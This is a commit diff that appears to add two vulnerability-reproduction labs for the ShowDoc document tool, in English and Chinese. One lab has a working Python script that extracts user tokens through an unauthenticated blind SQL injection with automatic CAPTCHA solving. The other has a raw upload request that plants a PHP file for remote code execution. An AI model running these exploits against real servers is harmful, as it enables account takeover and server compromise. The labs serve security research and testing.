first commit

showdoc/3.2.5-sqli/README.md

@@ -0,0 +1,43 @@
+# ShowDoc 3.2.5 SQL Injection
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ShowDoc is a tool greatly applicable for an IT team to share documents online. It can promote communication efficiency between members of a team.
+
+ShowDoc version <= 3.2.5, an unauthenticated SQL injection issue is found and attacker is able to steal user password and token from SQLite database.
+
+References:
+
+- <https://github.com/star7th/showdoc/commit/84fc28d07c5dfc894f5fbc6e8c42efd13c976fda>
+
+## Vulnerable environment
+
+Execute following command to start a ShowDoc server 3.2.4:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse `http://your-ip:8080` to see the index page of ShowDoc. Log in the portal using username `showdoc` and password `123456`.
+
+## Exploit
+
+Once a user has logged into ShowDoc, a user token is generated in the SQLite database. Compared to stealing a user's hashed password through SQL injection，user token is a more useful target.
+
+Before exploiting the issue, a CAPTCHA recognition library is required:
+
+```
+pip install onnxruntime ddddocr requests
+```
+
+Then use [this POC](poc.py) to extract the token:
+
+```
+python3 poc.py -u http://localhost:8080
+```
+
+![](1.png)
+
+To test if the token is valid:
+
+![](2.png)

showdoc/3.2.5-sqli/README.zh-cn.md

@@ -0,0 +1,41 @@
+# ShowDoc 3.2.5 SQL注入漏洞
+
+ShowDoc 是一个开源的在线共享文档工具。
+
+ShowDoc <= 3.2.5 存在一处未授权SQL注入漏洞，攻击者可以利用该漏洞窃取保存在SQLite数据库中的用户密码和Token。
+
+参考链接：
+
+- <https://github.com/star7th/showdoc/commit/84fc28d07c5dfc894f5fbc6e8c42efd13c976fda>
+
+## 漏洞环境
+
+执行如下命令启动一个ShowDoc 2.8.2服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`即可查看到ShowDoc的主页。初始化成功后，使用帐号`showdoc`和密码`123456`登录用户界面。
+
+## 漏洞复现
+
+一旦一个用户登录进ShowDoc，其用户token将会被保存在SQLite数据库中。相比于获取hash后的用户密码，用户token是一个更好地选择。
+
+在利用该漏洞前，需要安装验证码识别库，因为该漏洞需要每次请求前传入验证验：
+
+```
+pip install onnxruntime ddddocr requests
+```
+
+然后，执行[这个POC](poc.py)来获取token：
+
+```
+python3 poc.py -u http://localhost:8080
+```
+
+![](1.png)
+
+测试一下这个token是否是合法的：
+
+![](2.png)

showdoc/3.2.5-sqli/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ web:
+   image: vulhub/showdoc:3.2.4
+   ports:
+    - "8080:80"

showdoc/3.2.5-sqli/poc.py

@@ -0,0 +1,86 @@
+import argparse
+import ddddocr
+import requests
+import onnxruntime
+from urllib.parse import urljoin
+
+
+onnxruntime.set_default_logger_severity(3)
+table = '0123456789abcdef'
+proxies = {'http': 'http://127.0.0.1:8085'}
+ocr = ddddocr.DdddOcr()
+ocr.set_ranges(table)
+
+
+class RetryException(Exception):
+    pass
+
+
+def retry_when_failed(func):
+    def retry_func(*args, **kwargs):
+        while True:
+            try:
+                return func(*args, **kwargs)
+            except RetryException:
+                continue
+            except Exception as e:
+                raise e
+
+    return retry_func
+
+
+def generate_captcha(base: str):
+    data = requests.get(f"{base}?s=/api/common/createCaptcha").json()
+    captcha_id = data['data']['captcha_id']
+
+    response = requests.get(f'{base}?s=/api/common/showCaptcha&captcha_id={captcha_id}')
+    data = response.content
+    result = ocr.classification(data)
+    return captcha_id, result
+
+
+@retry_when_failed
+def exploit_one(base: str, current: str, ch: str) -> str:
+    captcha_id, captcha_text = generate_captcha(base)
+    data = requests.get(base, params={
+        's': '/api/item/pwd',
+        'page_id': '0',
+        'password': '1',
+        'captcha_id': captcha_id,
+        'captcha': captcha_text,
+        'item_id': f"aa') UNION SELECT 1,1,1,1,1,(SELECT 1 FROM user_token WHERE uid = 1 AND token LIKE '{current}{ch}%' LIMIT 1),1,1,1,1,1,1 FROM user_token; -- "
+    }).json()
+
+    if data['error_code'] == 0:
+        return ch
+    elif data['error_code'] == 10010:
+        return ''
+    elif data['error_code'] == 10206:
+        raise RetryException()
+    else:
+        print(f'error: {data!r}')
+        raise Exception('unknown exception')
+
+
+def main():
+    parser = argparse.ArgumentParser(description='Showdoc 3.2.5 SQL injection')
+    parser.add_argument('-u', '--url', type=str, required=True)
+
+    args = parser.parse_args()
+    target = urljoin(args.url, '/server/index.php')
+    res = ''
+    for i in range(64):
+        r = ''
+        for ch in list(table):
+            r = exploit_one(target, res, ch)
+            if r:
+                res += ch
+                break
+
+        print(f'Current result: {res}')
+        if not r:
+            break
+
+
+if __name__ == '__main__':
+    main()

showdoc/CNVD-2020-26585/README.md

@@ -0,0 +1,56 @@
+# ShowDoc Unauthenticated File Upload and Remote Code Execution (CNVD-2020-26585)
+
+[中文版本(Chinese version)](README.zh-cn.md)
+
+ShowDoc is a tool greatly applicable for an IT team to share documents online. It can promote communication efficiency between members of a team.
+
+ShowDoc version before 2.8.7, an unrestricted and unauthenticated file upload issue is found and attacker is able to upload a webshell and execute arbitrary code on server.
+
+References:
+
+- <https://github.com/star7th/showdoc/pull/1059>
+- <https://github.com/star7th/showdoc/commit/fb77dd4db88dc23f5e570fc95919ee882aca520a>
+- <https://github.com/star7th/showdoc/commit/e1cd02a3f98bb227c0599e7fa6b803ab1097597f>
+
+## Vulnerable environment
+
+Execute following command to start a ShowDoc server 2.8.2:
+
+```
+docker compose up -d
+```
+
+After the server is started, browse `http://your-ip:8080` to see the index page of ShowDoc.
+
+## Exploit
+
+Simply send following request to upload a PHP file:
+
+```
+POST /index.php?s=/home/page/uploadImg HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0RdOKBR8AmAxfRyl
+Content-Length: 213
+
+------WebKitFormBoundary0RdOKBR8AmAxfRyl
+Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
+Content-Type: text/plain
+
+<?=phpinfo();?>
+------WebKitFormBoundary0RdOKBR8AmAxfRyl--
+
+```
+
+PHP file address will be respond:
+
+![](1.png)
+
+`phpinfo()` is executed successfully:
+
+![](2.png)

showdoc/CNVD-2020-26585/README.zh-cn.md

@@ -0,0 +1,54 @@
+# ShowDoc 前台任意文件上传（CNVD-2020-26585）
+
+Showdoc 是一个开源的在线共享文档工具。
+
+Showdoc <= 2.8.6 存在uploadImg 文件上传漏洞，该漏洞源于未正确使用upload方法至文件后缀限制失效，攻击者可在未授权的情况下上传任意文件，进而获取服务器权限等。
+
+参考链接：
+
+- <https://github.com/star7th/showdoc/pull/1059>
+- <https://github.com/star7th/showdoc/commit/fb77dd4db88dc23f5e570fc95919ee882aca520a>
+- <https://github.com/star7th/showdoc/commit/e1cd02a3f98bb227c0599e7fa6b803ab1097597f>
+
+## 漏洞环境
+
+执行如下命令启动一个ShowDoc 2.8.2服务器：
+
+```
+docker compose up -d
+```
+
+服务启动后，访问`http://your-ip:8080`即可查看到ShowDoc的主页。
+
+## 漏洞复现
+
+发送如下请求上传一个PHP文件：
+
+```
+POST /index.php?s=/home/page/uploadImg HTTP/1.1
+Host: localhost:8080
+Accept-Encoding: gzip, deflate, br
+Accept: */*
+Accept-Language: en-US;q=0.9,en;q=0.8
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
+Connection: close
+Cache-Control: max-age=0
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0RdOKBR8AmAxfRyl
+Content-Length: 213
+
+------WebKitFormBoundary0RdOKBR8AmAxfRyl
+Content-Disposition: form-data; name="editormd-image-file"; filename="test.<>php"
+Content-Type: text/plain
+
+<?=phpinfo();?>
+------WebKitFormBoundary0RdOKBR8AmAxfRyl--
+
+```
+
+PHP文件路径将返回在数据包中：
+
+![](1.png)
+
+访问即可查看到`phpinfo()`执行结果：
+
+![](2.png)

showdoc/CNVD-2020-26585/docker-compose.yml

@@ -0,0 +1,6 @@
+version: '2'
+services:
+ web:
+   image: vulhub/showdoc:2.8.2
+   ports:
+    - "8080:80"